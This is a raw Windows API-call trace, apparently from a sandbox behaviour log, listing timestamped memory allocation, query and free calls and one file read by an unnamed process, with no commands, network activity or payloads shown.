	[0219.308] VirtualFree (lpAddress=0x1d90000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.308] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x1d90000
	[0219.308] VirtualAlloc (lpAddress=0x0, dwSize=0x17, flAllocationType=0x3000, flProtect=0x4) returned 0x1da0000
	[0219.308] VirtualQuery (in: lpAddress=0x1be0000, lpBuffer=0x1b5da98, dwLength=0x1c | out: lpBuffer=0x1b5da98*(BaseAddress=0x1be0000, AllocationBase=0x1be0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.308] VirtualQuery (in: lpAddress=0x1be0000, lpBuffer=0x1b5da94, dwLength=0x1c | out: lpBuffer=0x1b5da94*(BaseAddress=0x1be0000, AllocationBase=0x1be0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.308] VirtualAlloc (lpAddress=0x0, dwSize=0x180, flAllocationType=0x3000, flProtect=0x4) returned 0x1dc0000
	[0219.309] VirtualFree (lpAddress=0x1be0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.309] VirtualAlloc (lpAddress=0x0, dwSize=0x25, flAllocationType=0x3000, flProtect=0x4) returned 0x1be0000
	[0219.309] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x1dd0000
	[0219.310] VirtualAlloc (lpAddress=0x0, dwSize=0x1f, flAllocationType=0x3000, flProtect=0x4) returned 0x1de0000
	[0219.310] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x1df0000
	[0219.310] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x1f00000
	[0219.310] VirtualAlloc (lpAddress=0x0, dwSize=0x1e, flAllocationType=0x3000, flProtect=0x4) returned 0x1f10000
	[0219.311] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x1f20000
	[0219.311] VirtualAlloc (lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x4) returned 0x1f30000
	[0219.311] VirtualQuery (in: lpAddress=0x1dc0000, lpBuffer=0x1b5da98, dwLength=0x1c | out: lpBuffer=0x1b5da98*(BaseAddress=0x1dc0000, AllocationBase=0x1dc0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.311] VirtualQuery (in: lpAddress=0x1dc0000, lpBuffer=0x1b5da94, dwLength=0x1c | out: lpBuffer=0x1b5da94*(BaseAddress=0x1dc0000, AllocationBase=0x1dc0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.311] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x1f40000
	[0219.311] VirtualFree (lpAddress=0x1dc0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.312] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x1dc0000
	[0219.312] VirtualAlloc (lpAddress=0x0, dwSize=0x2, flAllocationType=0x3000, flProtect=0x4) returned 0x1f50000
	[0219.312] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x1f60000
	[0219.312] VirtualFree (lpAddress=0x1f50000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.313] VirtualFree (lpAddress=0x1dc0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.313] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x1dc0000
	[0219.313] VirtualAlloc (lpAddress=0x0, dwSize=0xe0, flAllocationType=0x3000, flProtect=0x4) returned 0x1f50000
	[0219.313] VirtualAlloc (lpAddress=0x0, dwSize=0x3fc, flAllocationType=0x3000, flProtect=0x4) returned 0x1f70000
	[0219.313] VirtualQuery (in: lpAddress=0x1f70000, lpBuffer=0x1b5da9c, dwLength=0x1c | out: lpBuffer=0x1b5da9c*(BaseAddress=0x1f70000, AllocationBase=0x1f70000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.314] VirtualFree (lpAddress=0x1f70000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.314] VirtualFree (lpAddress=0x1f50000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.314] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x1f50000
	[0219.314] VirtualAlloc (lpAddress=0x0, dwSize=0x50, flAllocationType=0x3000, flProtect=0x4) returned 0x1f70000
	[0219.314] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x1f80000
	[0219.315] VirtualAlloc (lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x4) returned 0x1f90000
	[0219.315] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x4) returned 0x1fa0000
	[0219.315] VirtualAlloc (lpAddress=0x0, dwSize=0x38, flAllocationType=0x3000, flProtect=0x4) returned 0x1fb0000
	[0219.316] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x1fc0000
	[0219.316] VirtualAlloc (lpAddress=0x0, dwSize=0x79, flAllocationType=0x3000, flProtect=0x4) returned 0x1fd0000
	[0219.316] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x1fe0000
	[0219.316] VirtualFree (lpAddress=0x1fb0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.316] VirtualFree (lpAddress=0x1fc0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.317] VirtualFree (lpAddress=0x1fa0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.317] VirtualAlloc (lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x4) returned 0x1fa0000
	[0219.317] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x1fb0000
	[0219.317] VirtualAlloc (lpAddress=0x0, dwSize=0xe0, flAllocationType=0x3000, flProtect=0x4) returned 0x1fc0000
	[0219.318] VirtualAlloc (lpAddress=0x0, dwSize=0x3fc, flAllocationType=0x3000, flProtect=0x4) returned 0x1ff0000
	[0219.318] VirtualQuery (in: lpAddress=0x1ff0000, lpBuffer=0x1b5da9c, dwLength=0x1c | out: lpBuffer=0x1b5da9c*(BaseAddress=0x1ff0000, AllocationBase=0x1ff0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.318] VirtualFree (lpAddress=0x1ff0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.318] VirtualFree (lpAddress=0x1fc0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.318] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x4) returned 0x1fc0000
	[0219.319] VirtualAlloc (lpAddress=0x0, dwSize=0x50, flAllocationType=0x3000, flProtect=0x4) returned 0x1ff0000
	[0219.319] VirtualAlloc (lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x4) returned 0x2000000
	[0219.319] VirtualAlloc (lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x4) returned 0x2010000
	[0219.320] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2020000
	[0219.320] VirtualAlloc (lpAddress=0x0, dwSize=0x14, flAllocationType=0x3000, flProtect=0x4) returned 0x2030000
	[0219.320] VirtualAlloc (lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x4) returned 0x2040000
	[0219.320] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x2050000
	[0219.321] VirtualAlloc (lpAddress=0x0, dwSize=0x2, flAllocationType=0x3000, flProtect=0x4) returned 0x2060000
	[0219.321] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x2070000
	[0219.321] VirtualFree (lpAddress=0x2060000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.322] VirtualFree (lpAddress=0x2050000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.322] VirtualAlloc (lpAddress=0x0, dwSize=0x17, flAllocationType=0x3000, flProtect=0x4) returned 0x2050000
	[0219.322] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x2060000
	[0219.322] VirtualAlloc (lpAddress=0x0, dwSize=0x2, flAllocationType=0x3000, flProtect=0x4) returned 0x2080000
	[0219.323] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x2090000
	[0219.323] VirtualFree (lpAddress=0x2080000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.323] VirtualFree (lpAddress=0x2060000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.323] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2060000
	[0219.324] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x2080000
	[0219.324] VirtualAlloc (lpAddress=0x0, dwSize=0x2, flAllocationType=0x3000, flProtect=0x4) returned 0x20a0000
	[0219.324] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x20b0000
	[0219.324] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.325] VirtualFree (lpAddress=0x2080000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.325] VirtualAlloc (lpAddress=0x0, dwSize=0x35, flAllocationType=0x3000, flProtect=0x4) returned 0x2080000
	[0219.325] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x20a0000
	[0219.325] VirtualAlloc (lpAddress=0x0, dwSize=0x36, flAllocationType=0x3000, flProtect=0x4) returned 0x20c0000
	[0219.326] VirtualQuery (in: lpAddress=0x20a0000, lpBuffer=0x1b5daa8, dwLength=0x1c | out: lpBuffer=0x1b5daa8*(BaseAddress=0x20a0000, AllocationBase=0x20a0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.326] VirtualQuery (in: lpAddress=0x20a0000, lpBuffer=0x1b5daa4, dwLength=0x1c | out: lpBuffer=0x1b5daa4*(BaseAddress=0x20a0000, AllocationBase=0x20a0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.326] VirtualAlloc (lpAddress=0x0, dwSize=0x38, flAllocationType=0x3000, flProtect=0x4) returned 0x20d0000
	[0219.326] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.326] VirtualAlloc (lpAddress=0x0, dwSize=0x1c, flAllocationType=0x3000, flProtect=0x4) returned 0x20a0000
	[0219.326] VirtualAlloc (lpAddress=0x0, dwSize=0x84, flAllocationType=0x3000, flProtect=0x4) returned 0x20e0000
	[0219.327] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x20f0000
	[0219.327] VirtualFree (lpAddress=0x2080000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.327] VirtualFree (lpAddress=0x20c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.327] VirtualFree (lpAddress=0x20d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.328] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.328] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2080000
	[0219.328] VirtualAlloc (lpAddress=0x0, dwSize=0xe0, flAllocationType=0x3000, flProtect=0x4) returned 0x20a0000
	[0219.328] VirtualAlloc (lpAddress=0x0, dwSize=0x3fc, flAllocationType=0x3000, flProtect=0x4) returned 0x20c0000
	[0219.328] VirtualQuery (in: lpAddress=0x20c0000, lpBuffer=0x1b5da9c, dwLength=0x1c | out: lpBuffer=0x1b5da9c*(BaseAddress=0x20c0000, AllocationBase=0x20c0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.329] VirtualFree (lpAddress=0x20c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.329] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.329] VirtualAlloc (lpAddress=0x0, dwSize=0x35, flAllocationType=0x3000, flProtect=0x4) returned 0x20a0000
	[0219.329] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x20c0000
	[0219.330] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x20d0000
	[0219.330] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x4) returned 0x2100000
	[0219.330] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2110000
	[0219.330] VirtualAlloc (lpAddress=0x0, dwSize=0x66, flAllocationType=0x3000, flProtect=0x4) returned 0x2120000
	[0219.331] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2130000
	[0219.331] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.331] VirtualFree (lpAddress=0x20c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.331] VirtualFree (lpAddress=0x2100000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.332] VirtualFree (lpAddress=0x20d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.332] VirtualFree (lpAddress=0x2110000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.332] VirtualAlloc (lpAddress=0x0, dwSize=0xe0, flAllocationType=0x3000, flProtect=0x4) returned 0x20a0000
	[0219.332] VirtualAlloc (lpAddress=0x0, dwSize=0x3fc, flAllocationType=0x3000, flProtect=0x4) returned 0x20c0000
	[0219.333] VirtualQuery (in: lpAddress=0x20c0000, lpBuffer=0x1b5da9c, dwLength=0x1c | out: lpBuffer=0x1b5da9c*(BaseAddress=0x20c0000, AllocationBase=0x20c0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.333] VirtualFree (lpAddress=0x20c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.333] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.333] VirtualAlloc (lpAddress=0x0, dwSize=0x35, flAllocationType=0x3000, flProtect=0x4) returned 0x20a0000
	[0219.333] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x20c0000
	[0219.334] VirtualAlloc (lpAddress=0x0, dwSize=0x3c, flAllocationType=0x3000, flProtect=0x4) returned 0x20d0000
	[0219.334] VirtualQuery (in: lpAddress=0x20c0000, lpBuffer=0x1b5daa8, dwLength=0x1c | out: lpBuffer=0x1b5daa8*(BaseAddress=0x20c0000, AllocationBase=0x20c0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.334] VirtualQuery (in: lpAddress=0x20c0000, lpBuffer=0x1b5daa4, dwLength=0x1c | out: lpBuffer=0x1b5daa4*(BaseAddress=0x20c0000, AllocationBase=0x20c0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.334] VirtualAlloc (lpAddress=0x0, dwSize=0x38, flAllocationType=0x3000, flProtect=0x4) returned 0x2100000
	[0219.334] VirtualFree (lpAddress=0x20c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.335] VirtualAlloc (lpAddress=0x0, dwSize=0x58, flAllocationType=0x3000, flProtect=0x4) returned 0x20c0000
	[0219.335] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x4) returned 0x2110000
	[0219.335] VirtualAlloc (lpAddress=0x0, dwSize=0x1a, flAllocationType=0x3000, flProtect=0x4) returned 0x2140000
	[0219.335] VirtualAlloc (lpAddress=0x0, dwSize=0x82, flAllocationType=0x3000, flProtect=0x4) returned 0x2150000
	[0219.336] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2160000
	[0219.336] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.336] VirtualFree (lpAddress=0x20d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.336] VirtualFree (lpAddress=0x2100000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.337] VirtualFree (lpAddress=0x2110000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.337] VirtualFree (lpAddress=0x20c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.337] VirtualFree (lpAddress=0x2140000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.337] VirtualAlloc (lpAddress=0x0, dwSize=0xe0, flAllocationType=0x3000, flProtect=0x4) returned 0x20a0000
	[0219.338] VirtualAlloc (lpAddress=0x0, dwSize=0x3fc, flAllocationType=0x3000, flProtect=0x4) returned 0x20c0000
	[0219.338] VirtualQuery (in: lpAddress=0x20c0000, lpBuffer=0x1b5da9c, dwLength=0x1c | out: lpBuffer=0x1b5da9c*(BaseAddress=0x20c0000, AllocationBase=0x20c0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.338] VirtualFree (lpAddress=0x20c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.338] VirtualFree (lpAddress=0x20a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.338] ReadFile (in: hFile=0x114, lpBuffer=0x17492a0, nNumberOfBytesToRead=0x800, lpNumberOfBytesRead=0x1b5e178, lpOverlapped=0x1b5e13c | out: lpBuffer=0x17492a0*, lpNumberOfBytesRead=0x1b5e178*=0x800, lpOverlapped=0x1b5e13c) returned 1
	[0219.339] VirtualAlloc (lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x4) returned 0x20a0000
	[0219.339] VirtualAlloc (lpAddress=0x0, dwSize=0x50, flAllocationType=0x3000, flProtect=0x4) returned 0x20c0000
	[0219.339] VirtualAlloc (lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x4) returned 0x20d0000
	[0219.339] VirtualAlloc (lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x4) returned 0x2100000
	[0219.340] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x2110000
	[0219.340] VirtualAlloc (lpAddress=0x0, dwSize=0x35, flAllocationType=0x3000, flProtect=0x4) returned 0x2140000
	[0219.340] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x2170000
	[0219.341] VirtualAlloc (lpAddress=0x0, dwSize=0x78, flAllocationType=0x3000, flProtect=0x4) returned 0x2180000
	[0219.341] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2190000
	[0219.341] VirtualFree (lpAddress=0x2140000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.341] VirtualFree (lpAddress=0x2170000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.342] VirtualFree (lpAddress=0x2110000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.342] VirtualAlloc (lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x4) returned 0x2110000
	[0219.342] VirtualAlloc (lpAddress=0x0, dwSize=0x19, flAllocationType=0x3000, flProtect=0x4) returned 0x2140000
	[0219.342] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x2170000
	[0219.343] VirtualAlloc (lpAddress=0x0, dwSize=0x1b, flAllocationType=0x3000, flProtect=0x4) returned 0x21a0000
	[0219.343] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x21b0000
	[0219.343] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x21c0000
	[0219.344] VirtualAlloc (lpAddress=0x0, dwSize=0x2, flAllocationType=0x3000, flProtect=0x4) returned 0x21d0000
	[0219.344] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x21e0000
	[0219.344] VirtualFree (lpAddress=0x21d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.344] VirtualFree (lpAddress=0x21c0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.345] VirtualAlloc (lpAddress=0x0, dwSize=0xf, flAllocationType=0x3000, flProtect=0x4) returned 0x21c0000
	[0219.345] VirtualAlloc (lpAddress=0x0, dwSize=0x33, flAllocationType=0x3000, flProtect=0x4) returned 0x21d0000
	[0219.345] VirtualAlloc (lpAddress=0x0, dwSize=0x3, flAllocationType=0x3000, flProtect=0x4) returned 0x21f0000
	[0219.345] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x2200000
	[0219.346] VirtualFree (lpAddress=0x21f0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.346] VirtualFree (lpAddress=0x21d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.346] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x21d0000
	[0219.347] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x21f0000
	[0219.347] VirtualAlloc (lpAddress=0x0, dwSize=0x2, flAllocationType=0x3000, flProtect=0x4) returned 0x2210000
	[0219.347] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x2220000
	[0219.347] VirtualFree (lpAddress=0x2210000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.348] VirtualFree (lpAddress=0x21f0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.348] VirtualAlloc (lpAddress=0x0, dwSize=0x11, flAllocationType=0x3000, flProtect=0x4) returned 0x21f0000
	[0219.348] VirtualQuery (in: lpAddress=0x2100000, lpBuffer=0x1b5da98, dwLength=0x1c | out: lpBuffer=0x1b5da98*(BaseAddress=0x2100000, AllocationBase=0x2100000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.348] VirtualQuery (in: lpAddress=0x2100000, lpBuffer=0x1b5da94, dwLength=0x1c | out: lpBuffer=0x1b5da94*(BaseAddress=0x2100000, AllocationBase=0x2100000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.348] VirtualAlloc (lpAddress=0x0, dwSize=0x100, flAllocationType=0x3000, flProtect=0x4) returned 0x2210000
	[0219.349] VirtualFree (lpAddress=0x2100000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.349] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x2100000
	[0219.349] VirtualAlloc (lpAddress=0x0, dwSize=0x2, flAllocationType=0x3000, flProtect=0x4) returned 0x2230000
	[0219.349] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x2240000
	[0219.350] VirtualFree (lpAddress=0x2230000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.350] VirtualFree (lpAddress=0x2100000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.350] VirtualAlloc (lpAddress=0x0, dwSize=0x1b, flAllocationType=0x3000, flProtect=0x4) returned 0x2100000
	[0219.350] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2230000
	[0219.351] VirtualAlloc (lpAddress=0x0, dwSize=0xe0, flAllocationType=0x3000, flProtect=0x4) returned 0x2250000
	[0219.351] VirtualAlloc (lpAddress=0x0, dwSize=0x3fc, flAllocationType=0x3000, flProtect=0x4) returned 0x2260000
	[0219.351] VirtualQuery (in: lpAddress=0x2260000, lpBuffer=0x1b5da9c, dwLength=0x1c | out: lpBuffer=0x1b5da9c*(BaseAddress=0x2260000, AllocationBase=0x2260000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.351] VirtualFree (lpAddress=0x2260000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.352] VirtualFree (lpAddress=0x2250000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.352] VirtualAlloc (lpAddress=0x0, dwSize=0x12, flAllocationType=0x3000, flProtect=0x4) returned 0x2250000
	[0219.359] VirtualAlloc (lpAddress=0x0, dwSize=0x50, flAllocationType=0x3000, flProtect=0x4) returned 0x2260000
	[0219.359] VirtualAlloc (lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x4) returned 0x2270000
	[0219.360] VirtualAlloc (lpAddress=0x0, dwSize=0x80, flAllocationType=0x3000, flProtect=0x4) returned 0x2280000
	[0219.360] VirtualAlloc (lpAddress=0x0, dwSize=0x25, flAllocationType=0x3000, flProtect=0x4) returned 0x2290000
	[0219.360] VirtualAlloc (lpAddress=0x0, dwSize=0x35, flAllocationType=0x3000, flProtect=0x4) returned 0x22a0000
	[0219.361] VirtualAlloc (lpAddress=0x0, dwSize=0x20, flAllocationType=0x3000, flProtect=0x4) returned 0x22b0000
	[0219.361] VirtualAlloc (lpAddress=0x0, dwSize=0x7d, flAllocationType=0x3000, flProtect=0x4) returned 0x22c0000
	[0219.361] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x22d0000
	[0219.361] VirtualFree (lpAddress=0x22a0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.362] VirtualFree (lpAddress=0x22b0000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.362] VirtualFree (lpAddress=0x2290000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.362] VirtualAlloc (lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x4) returned 0x2290000
	[0219.363] VirtualAlloc (lpAddress=0x0, dwSize=0x17, flAllocationType=0x3000, flProtect=0x4) returned 0x22a0000
	[0219.363] VirtualAlloc (lpAddress=0x0, dwSize=0x1b, flAllocationType=0x3000, flProtect=0x4) returned 0x22b0000
	[0219.363] VirtualAlloc (lpAddress=0x0, dwSize=0xd, flAllocationType=0x3000, flProtect=0x4) returned 0x22e0000
	[0219.363] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x22f0000
	[0219.364] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2300000
	[0219.364] VirtualAlloc (lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x4) returned 0x2310000
	[0219.364] VirtualAlloc (lpAddress=0x0, dwSize=0x15, flAllocationType=0x3000, flProtect=0x4) returned 0x2320000
	[0219.365] VirtualQuery (in: lpAddress=0x2280000, lpBuffer=0x1b5da98, dwLength=0x1c | out: lpBuffer=0x1b5da98*(BaseAddress=0x2280000, AllocationBase=0x2280000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.365] VirtualQuery (in: lpAddress=0x2280000, lpBuffer=0x1b5da94, dwLength=0x1c | out: lpBuffer=0x1b5da94*(BaseAddress=0x2280000, AllocationBase=0x2280000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0219.365] VirtualAlloc (lpAddress=0x0, dwSize=0x100, flAllocationType=0x3000, flProtect=0x4) returned 0x2330000
	[0219.365] VirtualFree (lpAddress=0x2280000, dwSize=0x0, dwFreeType=0x8000) returned 1
	[0219.365] VirtualAlloc (lpAddress=0x0, dwSize=0x16, flAllocationType=0x3000, flProtect=0x4) returned 0x2280000
	[0219.366] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x2340000
	[0219.366] VirtualAlloc (lpAddress=0x0, dwSize=0x2, flAllocationType=0x3000, flProtect=0x4) returned 0x2350000
	[0219.366] VirtualAlloc (lpAddress=0x0, dwSize=0x30, flAllocationType=0x3000, flProtect=0x4) returned 0x2360000
